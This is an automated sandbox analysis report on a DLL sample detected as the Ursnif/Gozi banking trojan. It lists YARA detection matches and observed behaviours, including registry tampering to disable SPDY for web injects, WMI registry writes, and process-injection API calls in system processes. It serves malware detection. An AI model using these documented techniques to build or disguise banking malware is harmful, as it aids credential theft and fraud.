          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY

          E-Banking Fraud:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY
          Disables SPDY (HTTP compression, likely to perform web injects)Show sources
          Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Writes or reads registry keys via WMIShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Writes registry values via WMIShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033F4F73 GetProcAddress,NtCreateSection,memset,2_2_033F4F73
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033F11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_033F11A9
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033F34D0 NtMapViewOfSection,2_2_033F34D0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033FB159 NtQueryVirtualMemory,2_2_033FB159
          Source: C:\Windows\explorer.exeCode function: 32_2_04DAC458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,32_2_04DAC458
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA1C74 NtQuerySystemInformation,32_2_04DA1C74
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC9584 NtReadVirtualMemory,32_2_04DC9584
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA7D44 NtQueryInformationProcess,32_2_04DA7D44
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC1EEC NtCreateSection,32_2_04DC1EEC
          Source: C:\Windows\explorer.exeCode function: 32_2_04DAF640 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,32_2_04DAF640
          Source: C:\Windows\explorer.exeCode function: 32_2_04DBEF14 NtMapViewOfSection,32_2_04DBEF14
          Source: C:\Windows\explorer.exeCode function: 32_2_04DCF9A4 NtAllocateVirtualMemory,32_2_04DCF9A4
          Source: C:\Windows\explorer.exeCode function: 32_2_04DCC130 NtWriteVirtualMemory,32_2_04DCC130
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB1A9C RtlAllocateHeap,NtQueryInformationProcess,32_2_04DB1A9C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,32_2_04DB2BD8
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC9B4C NtQueryInformationProcess,32_2_04DC9B4C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DE1002 NtProtectVirtualMemory,NtProtectVirtualMemory,32_2_04DE1002
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DCF9A4 NtAllocateVirtualMemory,33_2_00DCF9A4
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DCC130 NtWriteVirtualMemory,33_2_00DCC130
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB1A9C NtQueryInformationProcess,33_2_00DB1A9C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,33_2_00DB2BD8
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC9B4C NtQueryInformationProcess,33_2_00DC9B4C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DAC458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,33_2_00DAC458
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC9584 NtReadVirtualMemory,33_2_00DC9584
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC1EEC NtCreateSection,33_2_00DC1EEC
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DAF640 NtQueryInformationToken,NtQueryInformationToken,NtClose,33_2_00DAF640
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DBEF14 NtMapViewOfSection,33_2_00DBEF14
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DE1002 NtProtectVirtualMemory,NtProtectVirtualMemory,33_2_00DE1002
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4359B4C NtQueryInformationProcess,35_2_000001E7A4359B4C
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A433F640 NtQueryInformationToken,NtQueryInformationToken,NtClose,35_2_000001E7A433F640
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4371002 NtProtectVirtualMemory,NtProtectVirtualMemory,35_2_000001E7A4371002
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033FAF342_2_033FAF34
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033F28E92_2_033F28E9
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA74A832_2_04DA74A8
          Source: C:\Windows\explorer.exeCode function: 32_2_04DAC45832_2_04DAC458
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC9C0432_2_04DC9C04
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB343832_2_04DB3438
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB750032_2_04DB7500
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA3F9832_2_04DA3F98
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB589032_2_04DB5890
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB285432_2_04DB2854
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA42CC32_2_04DA42CC
          Source: C:\Windows\explorer.exeCode function: 32_2_04DBAACC32_2_04DBAACC
          Source: C:\Windows\explorer.exeCode function: 32_2_04DAEBD032_2_04DAEBD0
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB6B8032_2_04DB6B80
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB44FC32_2_04DB44FC
          Source: C:\Windows\explorer.exeCode function: 32_2_04DADC8832_2_04DADC88
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC1C6832_2_04DC1C68
          Source: C:\Windows\explorer.exeCode function: 32_2_04DCD46832_2_04DCD468
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC7DDC32_2_04DC7DDC
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA559C32_2_04DA559C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC75B432_2_04DC75B4
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC15A032_2_04DC15A0
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC0D4032_2_04DC0D40
          Source: C:\Windows\explorer.exeCode function: 32_2_04DCED7C32_2_04DCED7C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA951432_2_04DA9514
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB1D1432_2_04DB1D14
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA1D2032_2_04DA1D20
          Source: C:\Windows\explorer.exeCode function: 32_2_04DBBE9C32_2_04DBBE9C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DCEFD032_2_04DCEFD0
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB97C832_2_04DB97C8
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB4F5C32_2_04DB4F5C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DBEF7C32_2_04DBEF7C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB2F1C32_2_04DB2F1C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA78F032_2_04DA78F0
          Source: C:\Windows\explorer.exeCode function: 32_2_04DCE09C32_2_04DCE09C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB386C32_2_04DB386C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB206C32_2_04DB206C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DBE80832_2_04DBE808
          Source: C:\Windows\explorer.exeCode function: 32_2_04DCE03832_2_04DCE038
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB11DC32_2_04DB11DC
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA49BC32_2_04DA49BC
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC029432_2_04DC0294
          Source: C:\Windows\explorer.exeCode function: 32_2_04DCFA1032_2_04DCFA10
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC6A2832_2_04DC6A28
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC2BD832_2_04DC2BD8
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC53D432_2_04DC53D4
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB3BF432_2_04DB3BF4
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA2B4032_2_04DA2B40
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB030432_2_04DB0304
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB589033_2_00DB5890
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB6B8033_2_00DB6B80
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DAC45833_2_00DAC458
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA78F033_2_00DA78F0
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DCE09C33_2_00DCE09C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB285433_2_00DB2854
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB386C33_2_00DB386C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB206C33_2_00DB206C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DBE80833_2_00DBE808
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DCE03833_2_00DCE038
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB11DC33_2_00DB11DC
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA49BC33_2_00DA49BC
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA42CC33_2_00DA42CC
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DBAACC33_2_00DBAACC
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC029433_2_00DC0294
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DCFA1033_2_00DCFA10
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC6A2833_2_00DC6A28
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC2BD833_2_00DC2BD8
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC53D433_2_00DC53D4
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DAEBD033_2_00DAEBD0
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB3BF433_2_00DB3BF4
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA2B4033_2_00DA2B40
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB030433_2_00DB0304
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB44FC33_2_00DB44FC
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DADC8833_2_00DADC88
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA74A833_2_00DA74A8
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC1C6833_2_00DC1C68
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DCD46833_2_00DCD468
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC9C0433_2_00DC9C04
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB343833_2_00DB3438
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC7DDC33_2_00DC7DDC
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA559C33_2_00DA559C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC75B433_2_00DC75B4
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC15A033_2_00DC15A0
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC0D4033_2_00DC0D40
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DCED7C33_2_00DCED7C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA951433_2_00DA9514
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB1D1433_2_00DB1D14
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB750033_2_00DB7500
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA1D2033_2_00DA1D20
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DBBE9C33_2_00DBBE9C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DCEFD033_2_00DCEFD0
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB97C833_2_00DB97C8
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA3F9833_2_00DA3F98
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB4F5C33_2_00DB4F5C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DBEF7C33_2_00DBEF7C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB2F1C33_2_00DB2F1C
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4346B8035_2_000001E7A4346B80
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A434589035_2_000001E7A4345890
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43349BC35_2_000001E7A43349BC
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43411DC35_2_000001E7A43411DC
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4356A2835_2_000001E7A4356A28
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A435FA1035_2_000001E7A435FA10
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A435029435_2_000001E7A4350294
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A434030435_2_000001E7A4340304
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A434AACC35_2_000001E7A434AACC
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43342CC35_2_000001E7A43342CC
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4332B4035_2_000001E7A4332B40
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4359C0435_2_000001E7A4359C04
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4343BF435_2_000001E7A4343BF4
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4352BD835_2_000001E7A4352BD8
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43553D435_2_000001E7A43553D4
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A433EBD035_2_000001E7A433EBD0
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A434343835_2_000001E7A4343438
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4351C6835_2_000001E7A4351C68
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A435D46835_2_000001E7A435D468
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A433C45835_2_000001E7A433C458
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43374A835_2_000001E7A43374A8
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A433DC8835_2_000001E7A433DC88
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43444FC35_2_000001E7A43444FC
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A434750035_2_000001E7A4347500
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4350D4035_2_000001E7A4350D40
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4331D2035_2_000001E7A4331D20
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4341D1435_2_000001E7A4341D14
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A433951435_2_000001E7A4339514
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A435ED7C35_2_000001E7A435ED7C
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43575B435_2_000001E7A43575B4
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A433559C35_2_000001E7A433559C
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43515A035_2_000001E7A43515A0
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4357DDC35_2_000001E7A4357DDC
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A434BE9C35_2_000001E7A434BE9C
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4342F1C35_2_000001E7A4342F1C
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A434EF7C35_2_000001E7A434EF7C
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4344F5C35_2_000001E7A4344F5C
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4333F9835_2_000001E7A4333F98
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43497C835_2_000001E7A43497C8
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A435EFD035_2_000001E7A435EFD0
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A435E03835_2_000001E7A435E038
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A434E80835_2_000001E7A434E808
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A434206C35_2_000001E7A434206C
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A434386C35_2_000001E7A434386C
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A434285435_2_000001E7A4342854
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A435E09C35_2_000001E7A435E09C
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43378F035_2_000001E7A43378F0
          Source: gayi4abp.dll.26.drStatic PE information: No import functions for PE file found
          Source: wi0gyoxl.dll.28.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
          Source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 00000016.00000003.789528617.000001F2CB9EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
          Source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
